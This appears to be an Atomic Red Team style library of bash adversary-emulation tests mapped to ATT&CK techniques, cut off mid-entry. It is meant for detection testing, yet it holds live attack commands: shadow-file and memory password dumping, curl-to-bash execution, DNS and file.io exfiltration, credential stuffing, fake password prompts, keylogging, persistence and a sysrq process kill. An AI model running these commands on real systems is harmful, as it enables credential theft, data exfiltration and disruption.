T1003.007
bash
elevated
linux
Capture Passwords with MimiPenguin
Proc Filesystem
MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring). Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file. See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.
sudo #{MimiPenguin_Location} > #{output_file}
cat #{output_file}
T1003.008
bash
elevated
linux
Access /etc/shadow (Local)
/etc/passwd and /etc/shadow
The /etc/shadow file is accessed in Linux environments.
sudo cat /etc/shadow > #{output_file}
cat #{output_file}
T1005
bash
linux
Find and dump sqlite databases (Linux)
Data from Local System
An adversary may know or assume that the user of a system uses sqlite databases which contain interesting and sensitive data. In this test we download two databases and a sqlite dump script, then run a find command to find and dump the database content.
cd $HOME
curl -O #{remote_url}/art
curl -O #{remote_url}/gta.db
curl -O #{remote_url}/sqlite_dump.sh
chmod +x sqlite_dump.sh
find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;
T1007
bash
linux
System Service Discovery - systemctl/service
System Service Discovery
Enumerates system services using systemctl (or service on FreeBSD).
if [ "$(uname)" = 'FreeBSD' ]; then service -e; else systemctl --type=service; fi;
T1016
bash
elevated
macos
List macOS Firewall Rules
System Network Configuration Discovery
This will test if the macOS firewall is enabled and/or show what rules are configured. Must be run with elevated privileges. Upon successful execution, these commands will output various information about the firewall configuration, including status and specific port/protocol blocks or allows. Using defaults, additional arguments can be added to see filtered details, such as globalstate for global configuration ("Is it on or off?"), firewall for common application allow rules, and explicitauths for specific rules configured by the user. Using socketfilterfw, flags such as --getglobalstate or --listapps can be used for similar filtering. At least one flag is required to send parseable output to standard out.
sudo defaults read /Library/Preferences/com.apple.alf
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
T1016.001
bash
macos, linux
Check internet connection using ping freebsd, linux or macos
Internet Connection Discovery
Check internet connection using ping on Linux or macOS. The default target of the ping is 8.8.8.8 (Google Public DNS).
ping -c 4 #{ping_target}
T1027.013
bash
linux, macos
Password-Protected ZIP Payload Extraction and Execution
Encrypted/Encoded File
Extracts and executes a script from a password-protected ZIP archive. This technique is commonly used by malware families like Emotet and QBot to deliver payloads via email attachments where the password is provided in the message body. The encrypted ZIP evades static file analysis until extracted at runtime. Upon successful execution, displays confirmation and system information.
echo '#!/bin/bash' > /tmp/art_payload.sh
echo 'echo "T1027.013: Payload extracted from encrypted ZIP"' >> /tmp/art_payload.sh
echo 'echo "Hostname: $(hostname)"' >> /tmp/art_payload.sh
echo 'echo "User: $(whoami)"' >> /tmp/art_payload.sh
echo 'uname -a' >> /tmp/art_payload.sh
cd /tmp && zip -P "#{zip_password}" art_encrypted.zip art_payload.sh
rm /tmp/art_payload.sh
echo "Encrypted ZIP created. Extracting with password..."
unzip -P "#{zip_password}" -o /tmp/art_encrypted.zip -d /tmp/
echo "Executing extracted payload:"
bash /tmp/art_payload.sh
RC Scripts
Modify rc.common [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html)
# The original 'sudo echo ... >> /etc/rc.common' ran the redirection as the unprivileged user and dropped the single quotes around the AppleScript; tee -a under sudo appends the line intact
echo "osascript -e 'tell app \"Finder\" to display dialog \"Hello World\"'" | sudo tee -a /etc/rc.common
RC Scripts
Modify rc.common
filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
sudo chmod +x /etc/rc.common
T1037.005
bash
elevated
macos
Add launch script to launch daemon
Startup Items
Add launch script to /Library/StartupItems to launch agent [Example](https://cybersecurity.att.com/blogs/labs-research/diversity-in-recent-mac-malware)
sudo cp #{path_startup_params} /Library/StartupItems/StartupParameters.plist
sudo cp #{path_malicious_script} /Library/StartupItems/atomic.sh
sudo cp #{path_malicious_plist} /tmp/T1037_005_daemon.plist
sudo /Library/StartupItems/atomic.sh start
T1037.005
bash
elevated
macos
Add launch script to launch agent
Startup Items
Add launch script to /Library/StartupItems to launch agent [Example](https://cybersecurity.att.com/blogs/labs-research/diversity-in-recent-mac-malware)
sudo cp #{path_startup_params} /Library/StartupItems/StartupParameters.plist
sudo cp #{path_malicious_script} /Library/StartupItems/atomic.sh
sudo cp #{path_malicious_plist} /tmp/T1037_005_agent.plist
/Library/StartupItems/atomic.sh start
T1040
bash
elevated
linux
Packet Capture Linux using tshark or tcpdump
Network Sniffing
Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed. Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.
tcpdump -c 5 -nnni #{interface}
tshark -c 5 -i #{interface}
T1040
bash
elevated
macos
Packet Capture macOS using tcpdump or tshark
Network Sniffing
Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed. Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface en0A.
sudo tcpdump -c 5 -nnni #{interface}
if [ -x "$(command -v tshark)" ]; then sudo tshark -c 5 -i #{interface}; fi;
T1040
bash
elevated
macos
Packet Capture macOS using /dev/bpfN with sudo
Network Sniffing
Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds.
sudo #{program_path} -i #{ifname} -t 3
T1040
bash
elevated
macos
Filtered Packet Capture macOS using /dev/bpfN with sudo
Network Sniffing
Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds.
sudo #{program_path} -f -i #{ifname} -t 3
T1040
bash
elevated
linux
Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo
Network Sniffing
Captures packets with domain=AF_PACKET, type=SOCK_RAW for a few seconds.
sudo #{program_path} -a -t 3
T1040
bash
elevated
linux
Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo
Network Sniffing
Captures packets with domain=AF_INET,type=SOCK_RAW,protocol=TCP for a few seconds.
sudo #{program_path} -4 -p 6 -t 3
T1040
bash
elevated
linux
Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo
Network Sniffing
Captures packets with domain=AF_INET,type=SOCK_PACKET,protocol=UDP for a few seconds. SOCK_PACKET is "obsolete" according to the man page, but still works on Ubuntu 20.04.
sudo #{program_path} -4 -P -p 17 -t 3
T1040
bash
elevated
linux
Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo
Network Sniffing
Captures packets with domain=AF_PACKET,type=SOCK_RAW for a few seconds. Sets a BPF filter on the socket to filter for UDP traffic.
sudo #{program_path} -a -f -t 3
T1046
bash
linux, macos
Port Scan
Network Service Discovery
Scan ports to check for listening ports. Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results are written to stdout.
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
T1048
bash
macos, linux
Exfiltrate Data using DNS Queries via dig
Exfiltration Over Alternative Protocol
This test demonstrates how an attacker can exfiltrate sensitive information by encoding it as a subdomain (using base64 encoding) and making DNS queries via the dig command to a controlled DNS server.
dig @#{attacker_dns_server} -p #{dns_port} $(echo "#{secret_info}" | base64).google.com
T1048.002
bash
macos, linux
Exfiltrate data HTTPS using curl freebsd,linux or macos
Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Exfiltrate data over HTTPS using curl to the file-sharing site file.io.
curl -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/
T1049
bash
linux, macos
System Network Connections Discovery via ss or lsof (Linux/MacOS)
System Network Connections Discovery
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
T1053.002
bash
containers
At - Schedule a job via kubectl in a Pod
At
Launches a short-lived Ubuntu pod, installs the at utility, starts the atd daemon, and submits a job with at. The pod is deleted after execution.
kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach --rm -i -- bash -lc "apt-get update -y >/dev/null 2>&1 && apt-get install -y at >/dev/null 2>&1 && (atd || /usr/sbin/atd) && echo '#{at_command}' | at #{time_spec} && at -l"
T1053.003
bash
elevated
macos, linux
Cron - Add script to all cron subfolders
Cron
This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
T1053.003
bash
elevated
linux
Cron - Add script to /var/spool/cron/crontabs/ folder
Cron
This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
T1053.006
bash
elevated
linux
Create Systemd Service and Timer
Systemd Timers
This test creates a systemd service and timer, then starts and enables the systemd timer.
echo "[Unit]" > #{path_to_systemd_service}
echo "Description=Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_service}
echo "[Service]" >> #{path_to_systemd_service}
echo "Type=simple" >> #{path_to_systemd_service}
echo "ExecStart=/bin/touch /tmp/art-systemd-timer-marker" >> #{path_to_systemd_service}
echo "[Install]" >> #{path_to_systemd_service}
echo "WantedBy=multi-user.target" >> #{path_to_systemd_service}
echo "[Unit]" > #{path_to_systemd_timer}
echo "Description=Executes Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_timer}
echo "Requires=#{systemd_service_name}" >> #{path_to_systemd_timer}
echo "[Timer]" >> #{path_to_systemd_timer}
echo "Unit=#{systemd_service_name}" >> #{path_to_systemd_timer}
echo "OnCalendar=*-*-* *:*:00" >> #{path_to_systemd_timer}
echo "[Install]" >> #{path_to_systemd_timer}
echo "WantedBy=timers.target" >> #{path_to_systemd_timer}
# daemon-reload must run before the newly written units can be enabled or started
systemctl daemon-reload
systemctl enable #{systemd_timer_name}
systemctl start #{systemd_timer_name}
Container Orchestration Job
Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
kubectl get cronjobs -n #{namespace}
Container Orchestration Job
Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
kubectl create -f src/cronjob.yaml -n #{namespace}
T1056.001
bash
linux
Bash session based keylogger
Keylogging
When a command is executed in bash, the BASH_COMMAND variable contains that command. For example, running `echo $BASH_COMMAND` prints "echo $BASH_COMMAND". The trap command is not an external command but a built-in function of bash, and can be used in a script to run a bash function when some event occurs. A trap on the DEBUG event fires before every command, so the value of BASH_COMMAND can be appended to a file each time it changes, creating a bash session-based keylogger. To gain persistence the command could be added to the user's .bashrc or .bash_aliases, or to the system's default .bashrc in /etc/skel/.
trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG
echo "Hello World!"
cat #{output_file}
Keylogging
Utilizes a Swift script to log keys to stdout. It runs for 5 seconds then dumps the output to standard output. Input Monitoring is required. Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring. Reference: https://cedowens.medium.com/taking-esf-for-a-nother-spin-6e1e6acd1b74
swift #{swift_src} -keylog
T1056.002
bash
macos
AppleScript - Prompt User for Password
GUI Input Capture
Prompt User for Password (Local Phishing) Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
T1056.002
bash
macos
AppleScript - Spoofing a credential prompt using osascript
GUI Input Capture
Prompt user for password without requiring permissions to send Apple events to System Settings. https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/
PWD_SPOOF=$(osascript -e 'display dialog "To perform a security update MacOS needs your passphrase." with title "MacOS Security Update" default answer "" with icon stop with hidden answer')
echo $PWD_SPOOF
T1059.004
bash
elevated
linux
Change login shell
Unix Shell
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test creates an art user with a /bin/bash shell, changes the user's shell to sh, then deletes the art user.
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
grep '^art:' /etc/passwd
chsh -s /bin/sh art
grep '^art:' /etc/passwd
T1070.003
bash
linux, macos
Clear and Disable Bash History Logging
Clear Command History
Clears the history and disables bash history logging for the current shell and future shell sessions.
set +o history
echo 'set +o history' >> ~/.bashrc
. ~/.bashrc
history -c
T1070.003
bash
elevated
linux
Clear Docker Container Logs
Clear Command History
Clears Docker container logs using the Docker CLI and the truncate command, removing all log entries.
docker container prune -f && sudo truncate -s 0 /var/lib/docker/containers/*/*-json.log
T1070.008
bash
elevated
linux
Copy and Delete Mailbox Data on Linux
Clear Mailbox Data
Copies and deletes mail data on Linux
mkdir -p /var/spool/mail/copy && for file in /var/spool/mail/*; do if [ "$(basename "$file")" != "copy" ]; then cp -R "$file" /var/spool/mail/copy/; fi; done && rm -rf /var/spool/mail/copy/*
T1070.008
bash
elevated
macos
Copy and Delete Mailbox Data on macOS
Clear Mailbox Data
Copies and deletes mail data on macOS
mkdir ~/Library/Mail/copy
cp -R ~/Library/Mail/* ~/Library/Mail/copy
rm -rf ~/Library/Mail/copy/*
T1070.008
bash
elevated
linux
Copy and Modify Mailbox Data on Linux
Clear Mailbox Data
Copies and modifies mail data on Linux
mkdir -p /var/spool/mail/copy; for file in /var/spool/mail/*; do if [ "$(basename "$file")" != "copy" ]; then cp -R "$file" /var/spool/mail/copy/; if [ -f "/var/spool/mail/copy/$(basename "$file")" ]; then echo "Modification for Atomic Red Test" >> "/var/spool/mail/copy/$(basename "$file")"; fi; fi; done
T1070.008
bash
elevated
macos
Copy and Modify Mailbox Data on macOS
Clear Mailbox Data
Copies and modifies mail data on macOS
mkdir ~/Library/Mail/copy
cp -R ~/Library/Mail/* ~/Library/Mail/copy
echo "Manipulated data" > ~/Library/Mail/copy/manipulated.txt
T1078.003
bash
elevated
macos
Create local account with admin privileges - MacOS
Local Accounts
After execution the new account will be active and added to the Administrators group
dscl . -create /Users/AtomicUser
dscl . -create /Users/AtomicUser UserShell /bin/bash
dscl . -create /Users/AtomicUser RealName "Atomic User"
dscl . -create /Users/AtomicUser UniqueID 503
dscl . -create /Users/AtomicUser PrimaryGroupID 503
dscl . -create /Users/AtomicUser NFSHomeDirectory /Local/Users/AtomicUser
dscl . -passwd /Users/AtomicUser mySecretPassword
dscl . -append /Groups/admin GroupMembership AtomicUser
T1078.003
bash
elevated
macos
Create local account with admin privileges using sysadminctl utility - MacOS
Local Accounts
After execution the new account will be active and added to the Administrators group
sysadminctl interactive -addUser art-tester -fullName ARTUser -password !pass123! -admin
T1078.003
bash
elevated
macos
Enable root account using dsenableroot utility - MacOS
Local Accounts
After execution the current/new user will have root access
dsenableroot #current user
dsenableroot -u art-tester -p art-tester -r art-root #new user
T1078.003
bash
elevated
macos
Add a new/existing user to the admin group using dseditgroup utility - macOS
Local Accounts
After execution the current/new user will be added to the Admin group
dseditgroup -o edit -a art-user -t user admin
T1078.003
bash
elevated
linux
Create local account (Linux)
Local Accounts
An adversary may wish to create an account with admin privileges to work with. In this test we create an "art" user with the password art, switch to art, execute whoami, exit and delete the art user.
password=$(openssl passwd -1 art)
# On FreeBSD, pw -H 0 reads the pre-hashed password from stdin (fd 0); the original "pw mod user testuser1 -h 0" targeted the wrong user and would have stored the hash string as the plaintext password
([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password "$password" art) || (pw useradd art -g wheel -s /bin/sh && (echo "$password" | pw usermod art -H 0))
su art -c "whoami; exit"
T1078.003
bash
elevated
linux
Reactivate a locked/expired account (Linux)
Local Accounts
A system administrator may have locked and expired a user account rather than deleting it ("the user is coming back at some stage"). An adversary may reactivate an inactive account in an attempt to appear legitimate. In this test we create an "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.
useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
usermod --lock art
usermod --expiredate "1" art
usermod --unlock art
usermod --expiredate "99999" art
su -c whoami art
T1078.003
bash
elevated
linux
Login as nobody (Linux)
Local Accounts
An adversary may try to re-purpose a system account to appear legitimate. In this test we change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin. Here is how the nobody entry should look in /etc/passwd before the test is executed and right after the cleanup: # - nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
grep '^nobody:' /etc/passwd
chsh --shell /bin/bash nobody
usermod --password $(openssl passwd -1 nobody) nobody
su -c "whoami" nobody
T1082
bash
elevated
linux
Linux VM Check via Hardware
System Information Discovery
Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware.
if [ -f /sys/class/dmi/id/bios_version ]; then grep -i amazon /sys/class/dmi/id/bios_version; fi
if [ -f /sys/class/dmi/id/product_name ]; then grep -i "Droplet\|HVM\|VirtualBox\|VMware" /sys/class/dmi/id/product_name; fi
if [ -f /sys/class/dmi/id/chassis_vendor ]; then grep -i "Xen\|Bochs\|QEMU" /sys/class/dmi/id/chassis_vendor; fi
# "quemu" in the original pattern was a typo for qemu and would never have matched
if [ -x "$(command -v dmidecode)" ]; then sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|qemu\|domu"; fi
if [ -f /proc/scsi/scsi ]; then grep -i "vmware\|vbox" /proc/scsi/scsi; fi
if [ -f /proc/ide/hd0/model ]; then grep -i "vmware\|vbox\|qemu\|virtual" /proc/ide/hd0/model; fi
if [ -x "$(command -v lspci)" ]; then sudo lspci | grep -i "vmware\|virtualbox"; fi
if [ -x "$(command -v lscpu)" ]; then sudo lscpu | grep -i "Xen\|KVM\|Microsoft"; fi
T1082
bash
elevated
linux
Linux VM Check via Kernel Modules
System Information Discovery
Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware.
sudo lsmod | grep -i "vboxsf\|vboxguest"
# the VMware balloon driver module is named vmw_balloon; the original pattern "vmw_baloon" would never match
sudo lsmod | grep -i "vmw_balloon\|vmxnet"
sudo lsmod | grep -i "xen-vbd\|xen-vnif"
sudo lsmod | grep -i "virtio_pci\|virtio_net"
sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
T1105
bash
linux, macos
sftp remote file copy (push)
Ingress Tool Transfer
Utilize sftp to perform a remote file copy (push)
sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
T1105
bash
containers
Curl Insecure Connection from a Pod
Ingress Tool Transfer
Launches an Ubuntu pod, installs curl, and executes curl with insecure flags (-k/--insecure) against a target URL. The pod is automatically deleted after execution.
kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- curl -ksL #{remote_url}
T1110.001
bash
elevated
linux
SUDO Brute Force - Debian
Password Guessing
An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudoers privileges, but they do not know the user's password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute-force password guessing attack without locking out the root user. This test creates the "art" user with a password of "password123", logs in, downloads and executes sudo_bruteforce.sh, which brute-force guesses the password, then deletes the user.
useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art
su -c "cd /tmp; curl -s #{remote_url} | bash" art
T1110.001
bash
elevated
linux
SUDO Brute Force - Redhat
Password Guessing
An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudoers privileges, but they do not know the user's password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute-force password guessing attack without locking out the root user. This test creates the "art" user with a password of "password123", logs in, downloads and executes sudo_bruteforce.sh, which brute-force guesses the password, then deletes the user.
useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art
# a bare "su art" would open an interactive shell and the following lines would not run as art; run them via su -c as the Debian variant does
su -c "cd /tmp; curl -s #{remote_url} | bash" art
T1110.001
bash
elevated
linux
SUDO Brute Force - FreeBSD
Password Guessing
An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudoers privileges, but they do not know the user's password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute-force password guessing attack without locking out the root user. This test creates the "art" user with a password of "password123", logs in, downloads and executes sudo_bruteforce.sh, which brute-force guesses the password, then deletes the user.
pw adduser art -g wheel -s /bin/sh
echo "password123" | pw usermod art -h 0
# a bare "su art" would open an interactive shell and the following lines would not run as art; run them via su -c as the Debian variant does
su -c "cd /tmp; curl -s #{remote_url} | bash" art
T1110.004
bash
linux
SSH Credential Stuffing From Linux
Credential Stuffing
Using username/password combinations from a password dump to log in over SSH.
cp "$PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt" /tmp/
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
T1110.004
bash
macos
SSH Credential Stuffing From MacOS
Credential Stuffing
Using username/password combinations from a password dump to log in over SSH.
cp "$PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt" /tmp/
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
T1113
bash
macos
Screencapture
Screen Capture
Use screencapture command to collect a full desktop screenshot
screencapture #{output_file}
T1113
bash
macos
Screencapture (silent)
Screen Capture
Use screencapture command to collect a full desktop screenshot
screencapture -x #{output_file}
T1113
bash
linux
X Windows Capture
Screen Capture
Use xwd command to collect a full desktop screenshot and review file with xwud
xwd -root -out #{output_file}
xwud -in #{output_file}
T1113
bash
linux
Capture Linux Desktop using Import Tool
Screen Capture
Use import command from ImageMagick to collect a full desktop screenshot
import -window root #{output_file}
T1115
bash
macos
Execute commands from clipboard
Clipboard Data
Echo a command to clipboard and execute it
echo ifconfig | pbcopy
$(pbpaste)
T1135
bash
elevated
linux
Network Share Discovery - linux
Network Share Discovery
Network Share Discovery using smbstatus
smbstatus --shares
T1136.001
bash
elevated
linux
Create a user account on a Linux system
Local Account
Create a user via useradd
useradd -M -N -r -s /bin/bash -c evil_account #{username}
T1136.001
bash
elevated
macos
Create a user account on a MacOS system
Local Account
Creates a user on a MacOS system with dscl
dscl . -create /Users/#{username}
dscl . -create /Users/#{username} UserShell /bin/zsh
dscl . -create /Users/#{username} RealName "#{realname}"
dscl . -create /Users/#{username} UniqueID "1010"
dscl . -create /Users/#{username} PrimaryGroupID 80
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
T1136.001
bash
elevated
linux
Create a new user in Linux with `root` UID and GID.
Local Account
Creates a new user in Linux and adds the user to the root group. This technique was used by adversaries during the Butter attack campaign.
useradd -g 0 -M -d /root -s /bin/bash #{username}
if grep -qi 'NAME="ubuntu"' /etc/os-release; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi;
T1136.001
bash
containers
Create a Linux user via kubectl in a Pod
Local Account
Launches a short-lived Alpine pod and creates a Linux user inside the pod. The pod is automatically deleted after execution.
kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- sh -lc 'adduser -D #{username} && id #{username}'
T1140
bash
linux, macos
XOR decoding and command execution using Python
Deobfuscate/Decode Files or Information
An adversary can obfuscate malicious commands or payloads using XOR and execute them on the victim's machine. This test uses Python to decode and execute commands on the machine.
# itertools.cycle repeats the key across the whole payload; the original zip(...) truncated the decoded command to the key length and shadowed the exec builtin
python3 -c 'import base64, itertools, subprocess; xor_decrypt = lambda text, key: "".join(chr(c ^ ord(k)) for c, k in zip(base64.b64decode(text), itertools.cycle(key))); command = "#{encrypted_command}"; key = "#{xor_key}"; decoded = xor_decrypt(command, key); subprocess.call(decoded, shell=True)'
T1195.002
bash
containers, linux
Simulate npm package installation on a Linux system
Compromise Software Supply Chain
Launches a short-lived Kubernetes pod using the Node 18 image, initializes a minimal npm project in /tmp/test, and installs the specified npm package with the --no-audit, --no-fund and --no-package-lock options, simulating potentially suspicious package retrieval (e.g., typosquatting/dependency confusion) from within a container. The pod is deleted after execution.
kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach --rm -i -- bash -lc "mkdir -p /tmp/test && cd /tmp/test && npm init -y >/dev/null 2>&1 && echo '--- package.json before install ---' && cat package.json && npm install #{package_name} --no-audit --no-fund --no-package-lock && echo '--- package.json after install ---' && cat package.json"
T1201
bash
linux
Examine password complexity policy - Ubuntu
Password Policy Discovery
Lists the password complexity policy to console on Ubuntu Linux.
cat /etc/pam.d/common-password
T1201
bash
linux
Examine password complexity policy - CentOS/RHEL 7.x
Password Policy Discovery
Lists the password complexity policy to console on CentOS/RHEL 7.x Linux.
cat /etc/security/pwquality.conf
T1201
bash
linux
Examine password complexity policy - CentOS/RHEL 6.x
Password Policy Discovery
Lists the password complexity policy to console on CentOS/RHEL 6.x Linux.
cat /etc/pam.d/system-auth
cat /etc/security/pwquality.conf
T1201
bash
linux
Examine password expiration policy - All Linux
Password Policy Discovery
Lists the password expiration policy to console on CentOS/RHEL/Ubuntu.
cat /etc/login.defs
T1201
bash
macos
Examine password policy - macOS
Password Policy Discovery
Lists the password policy to console on macOS.
pwpolicy getaccountpolicies
T1222.002
bash
linux, macos
chmod - Change file or folder mode (symbolic mode) recursively
Linux and Mac Permissions
Changes a file or folder's permissions recursively using chmod and a specified symbolic mode.
chmod -R #{symbolic_mode} #{file_or_folder}
T1222.002
bash
macos, linux
chown - Change file or folder ownership and group
Linux and Mac Permissions
Changes a file or folder's ownership and group information using chown.
chown #{owner}:#{group} #{file_or_folder}
T1222.002
bash
macos, linux
chown - Change file or folder ownership and group recursively
Linux and Mac Permissions
Changes a file or folder's ownership and group information recursively using chown.
chown -R #{owner}:#{group} #{file_or_folder}
T1222.002
bash
macos, linux
chown - Change file or folder ownership recursively
Linux and Mac Permissions
Changes a file or folder's ownership only recursively using chown.
chown -R #{owner} #{file_or_folder}
T1489
bash
elevated
linux
Abuse of Linux Magic System Request Key to Send a SIGTERM to All Processes
Service Stop
Adversaries with root or sufficient privileges can send a SIGTERM to all processes except init. By writing 'e' to /proc/sysrq-trigger, they can forcibly terminate every process except init.
echo "e" > /proc/sysrq-trigger
T1529
bash
elevated
linux
Reboot System via `halt` - Linux
System Shutdown/Reboot
This test restarts a Linux system using halt.
halt --reboot
T1529
bash
elevated
linux
Reboot System via `poweroff` - Linux
System Shutdown/Reboot
This test restarts a Linux system using poweroff.
poweroff --reboot
T1529
bash
elevated
linux
Abuse of Linux Magic System Request Key for Reboot
System Shutdown/Reboot
Adversaries with root or sufficient privileges can silently manipulate or destabilize a system. By writing 'b' to /proc/sysrq-trigger, they can force an immediate reboot.
echo "b" > /proc/sysrq-trigger
T1539
bash
macos
Steal Chrome Cookies via Remote Debugging (Mac)
Steal Web Session Cookie
The remote debugging functionality in Chrome can be used by malware for post-exploitation activities to obtain cookies without requiring keychain access. By initiating Chrome with a remote debug port, an attacker can sidestep encryption and employ Chrome's own mechanisms to access cookies. If successful, this test will output a list of cookies. Note: Chrome processes will be killed during this test. See https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e
killall 'Google Chrome'
sleep 1
open -a "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --args --remote-debugging-port=1337 --remote-allow-origins=http://localhost/
sleep 1
/tmp/WhiteChocolateMacademiaNut/chocolate -d cookies -p 1337
Launch Agent
Create a plist and execute it
if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi;
sudo cp #{path_malicious_plist} ~/Library/LaunchAgents/#{plist_filename}
sudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename}
T1543.001
bash
elevated
macos
Event Monitor Daemon Persistence
Launch Agent
This test adds persistence via a plist to execute via the macOS Event Monitor Daemon.
sudo cp #{script_location} #{script_destination}
sudo touch /private/var/db/emondClients/#{empty_file}
T1543.001
bash
elevated
macos
Launch Agent - Root Directory
Launch Agent
Create a plist and execute it
sudo cp #{path_malicious_plist} /Library/LaunchAgents/#{plist_filename}
launchctl load -w /Library/LaunchAgents/#{plist_filename}
T1543.002
bash
elevated
linux
Create Systemd Service
Systemd Service
